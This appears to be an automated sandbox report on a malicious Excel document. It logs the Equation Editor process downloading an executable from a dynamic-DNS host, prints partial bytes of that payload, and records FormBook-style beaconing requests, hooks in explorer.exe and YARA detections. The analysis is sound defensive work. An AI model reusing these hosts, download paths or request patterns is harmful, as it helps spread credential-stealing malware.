Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 2148088
General
Stream Path: EncryptedPackage
File Type: data
Stream Size: 2148088
Entropy: 7.99989686385
Base64 Encoded: True
Data ASCII: . . . . . . . r c = . . s c . 3 . . . . . . . . . . " L . C G . 4 . . $ ? . . . . . . ! . . e A D . . K . . = ' . . 4 . . . . ' . . . . . Z 9 ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 . H . ( 9 . 4 p . ) . n . . H 0 .
Data Raw: e7 c6 20 00 00 00 00 00 72 63 3d 0c f9 73 63 9a 33 18 12 1a 1a cd a4 8a a6 8a 8c 22 4c d0 43 47 bc 34 f9 fd 24 3f 99 ef cd 13 7f ed 21 1d e3 65 41 44 09 d2 4b aa 83 3d 27 a9 0c 34 bd 1e 96 ca 27 a9 bf bd 02 bc 5a 39 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08 48 0e 28 39 d5 34 70 2e 29 0f 6e 1c ee 48 30 08

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
General
Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.58731087048
Base64 Encoded: False
Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . p W . . . . . . < . ~ . . e < . . I . . ~ . . . . . . . . . . . . . 8 . . 4 . . . K | F . [ * . ` Q 0 . D . } . G y . . - .
Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp                  Protocol  SID      Message                                              Source Port  Dest Port  Source IP       Dest IP
11/26/20-09:03:42.330791   TCP       2022550  ET TROJAN Possible Malicious Macro DL EXE Feb 2016   49165        80         192.168.2.22    103.125.191.5
11/26/20-09:05:07.821191   TCP       1201     ATTACK-RESPONSES 403 Forbidden                       80           49167      34.102.136.180  192.168.2.22

Network Port Distribution

TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Nov 26, 2020 09:03:42.098721981 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:42.330104113 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.330276966 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:42.330790997 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:42.558485985 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.558520079 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.558537006 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.558552980 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.558569908 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:42.558594942 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:42.558605909 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:42.781543016 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781585932 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781598091 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781610012 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781641960 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781653881 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781672001 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781691074 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:42.781866074 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:43.008073092 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008105993 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008117914 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008130074 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008140087 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008151054 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008162022 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008173943 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008184910 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008198023 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008316040 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008335114 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.008457899 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:43.008502007 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:43.011636972 CET  49165        80         192.168.2.22   103.125.191.5
Nov 26, 2020 09:03:43.234186888 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.234216928 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.234227896 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.234240055 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.234251022 CET  80           49165      103.125.191.5  192.168.2.22
Nov 26, 2020 09:03:43.234261990 CET  80           49165      103.125.191.5  192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234289885 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234308004 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234323978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234343052 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234360933 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234375954 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234391928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234406948 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234421968 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234438896 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234453917 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.234472990 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.236116886 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.236160040 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.237555981 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462285995 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462318897 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462332010 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462342978 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462353945 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462371111 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462383032 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462394953 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462405920 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462418079 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462435961 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462446928 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462466002 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462481022 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462497950 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462513924 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462528944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462559938 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462575912 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.462718964 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462762117 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462768078 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.462771893 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.463511944 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463536024 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463547945 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463562012 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463582039 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.463598013 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.465749025 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465779066 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465785027 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465789080 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.465792894 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.688174009 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688205957 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688222885 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688239098 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688255072 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688266039 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.688270092 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688287020 CET8049165103.125.191.5192.168.2.22
                                                                                                                                                    Nov 26, 2020 09:03:43.688298941 CET4916580192.168.2.22103.125.191.5
                                                                                                                                                    Nov 26, 2020 09:03:43.688302994 CET8049165103.125.191.5192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2020 09:03:41.977698088 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:03:42.049458981 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:03:42.049945116 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:03:42.085334063 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:04:47.181237936 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:04:47.240686893 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:05:07.648457050 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:05:07.687747955 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Nov 26, 2020 09:05:27.941457033 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Nov 26, 2020 09:05:27.992831945 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 26, 2020 09:03:41.977698088 CET | 192.168.2.22 | 8.8.8.8 | 0x5142 | Standard query (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | A (IP address) | IN (0x0001)
Nov 26, 2020 09:03:42.049945116 CET | 192.168.2.22 | 8.8.8.8 | 0x5142 | Standard query (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu | A (IP address) | IN (0x0001)
Nov 26, 2020 09:04:47.181237936 CET | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.affinitymotorsales.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:05:07.648457050 CET | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.setyourhead.com | A (IP address) | IN (0x0001)
Nov 26, 2020 09:05:27.941457033 CET | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.akmh.pro | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 26, 2020 09:03:42.049458981 CET | 8.8.8.8 | 192.168.2.22 | 0x5142 | No error (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu |  | 103.125.191.5 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:03:42.085334063 CET | 8.8.8.8 | 192.168.2.22 | 0x5142 | No error (0) | workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu |  | 103.125.191.5 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:04:47.240686893 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.affinitymotorsales.com | affinitymotorsales.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:04:47.240686893 CET | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | affinitymotorsales.com |  | 216.130.188.93 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:05:07.687747955 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.setyourhead.com | setyourhead.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 26, 2020 09:05:07.687747955 CET | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | setyourhead.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 26, 2020 09:05:27.992831945 CET | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Name error (3) | www.akmh.pro | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
• www.affinitymotorsales.com
• www.setyourhead.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 103.125.191.5 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:03:42.330790997 CET | 1 | OUT | GET /worksdoc/svchost.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: workfinewsdysanotherrainbowlomoyentwsnma.ydns.eu
Connection: Keep-Alive
Nov 26, 2020 09:03:42.558485985 CET | 2 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Nov 2020 08:03:38 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Wed, 25 Nov 2020 23:15:49 GMT
ETag: "de000-5b4f69ba08c46"
Accept-Ranges: bytes
Content-Length: 909312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9e e5 be 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d4 0d 00 00 0a 00 00 00 00 00 00 1e f3 0d 00 00 20 00 00 00 00 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 f2 0d 00 4b 00 00 00 00 00 0e 00 10 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 d3 0d 00 00 20 00 00 00 d4 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 06 00 00 00 00 0e 00 00 08 00 00 00 d6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0e 00 00 02 00 00 00 de 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 6f 0b 00 08 83 02 00 03 00 00 00 31 00 00 06 f8 6a 02 00 d0 04 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 06 00 00 00 01 00 00 11 28 02 00 00 06 2a 00 00 13 30 
05 00 13 01 00 00 02 00 00 11 72 01 00 00 70 0a 06 72 09 00 00 70 28 08 00 00 06 28 09 00 00 06 3a c9 00 00 00 20 fa 1b 25 b4 20 e0 3a 01 ac 61 25 0c 1d 5e 45 07 00 00 00 05 00 00 00 a9 00 00 00 4f 00 00 00 d0 ff ff ff 1f 00 00 00 99 00 00 00 7d 00 00 00 38 a4 00 00 00 28 03 00 00 06 0b 07 2d 08 20 aa a8 23 fc 25 2b 06 20 eb 5c c8 de 25 26 2b b6 07 28 0d 00 00 06 28 0e 00 00 06 72 1d 00 00 70 28 0f 00 00 06 2c 08 20 2d 58 ab 08 25 2b 06 20 64 13 ed 55 25 26 08 20 2a ba e0 05 5a 61 2b 86 06 72 29 00 00 70 28 0a 00 00 06 28 0b 00 00 06 2c 08 20 25 c7 bf 5f 25 2b 06 20 c0 c9 bb 2a 25 26 08 20 d9 02 38 4b 5a 61 38 58 ff ff ff 72 4d 00 00 70 28 10 00 00 06 08 20 a6 ef a1 bc 5a 20 58 2c c2 78 61 38 3c ff ff ff 14 28 0c 00 00 06 20 ca 8a 29 b0 38 2c ff ff ff 14 fe 06 07 00 00 06 73 1d 00 00 0a 28 11 00 00 06 25 17 28 12 00 00 06 14 28 13 00 00 06 2a 00 13 30 03 00 0b 00 00 00 01 00 00 11 7f 01 00 00 04 28 27 00 00 06 2a 00 1b 30 05 00 4c 02 00 00 03 00 00 11 02 75 03 00 00 01 0a 06 3a 99 00 00 00 20 e5 fb d6 35 20 58 bd 35 1e 61 25 0b 1f 0e 5e 45 0e 00 00 00 05 00 00 00 8b 00 00 00 1f 00 00 00 de 00 00 00 b3 ff ff ff 7a 01 00 00 f7 00 00 00 67 00 00 00 5f 01 00 00 4c 00
                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_P @ @@K H.text$ `.rsrc@@.reloc @BHo1j0(*0rprp((: % :a%^EO}8(- #%+ \%&+((rp(, -X%+ dU%& *Za+r)p((, %_%+ *%& 8KZa8XrMp( Z X,xa8<( )8,s(%((*0('*0Lu: 5 X5a%^Ezg_L


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 216.130.188.93 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:04:47.360749960 CET | 949 | OUT | GET /kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg== HTTP/1.1
Host: www.affinitymotorsales.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 09:04:47.465672016 CET | 950 | IN | HTTP/1.1 302 Found
Cache-Control: no-cache
Content-length: 0
Location: https://www.affinitymotorsales.com/kgw/?FN=-ZD4lhJxcp08lll&YPxdA=D+Ti5aR1Wzy55HWIHky6cyQTuFVn7YolhMhL9zo9Uhy0mVzlryEZIhtqzRusDBhtj2h8Dg==
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 26, 2020 09:05:07.705564022 CET | 950 | OUT | GET /kgw/?YPxdA=qxnbG0TgnGHGw+QslghqCPaDw7mfFbPu6Z/l2x9tLypy5Il4TL/Oe56TI1g3tXVevJbT7w==&FN=-ZD4lhJxcp08lll HTTP/1.1
Host: www.setyourhead.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 26, 2020 09:05:07.821191072 CET | 951 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 08:05:07 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c9ca-113"
Via: 1.1 google
Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Code Manipulations

                                                                                                                                                    User Modules

                                                                                                                                                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                                                                                    Processes

                                                                                                                                                    Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                    Statistics

                                                                                                                                                    Behavior


                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:09:02:53
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:13
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:543304 bytes
                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:03:18
                                                                                                                                                    Start date:26/11/2020
                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                    Imagebase:0xe80000
                                                                                                                                                    File size:909312 bytes
                                                                                                                                                    MD5 hash:5DEDC928F9F5E3A4C59490E79BCF0773
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2189231166.00000000023CF000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2191333109.00000000036C5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
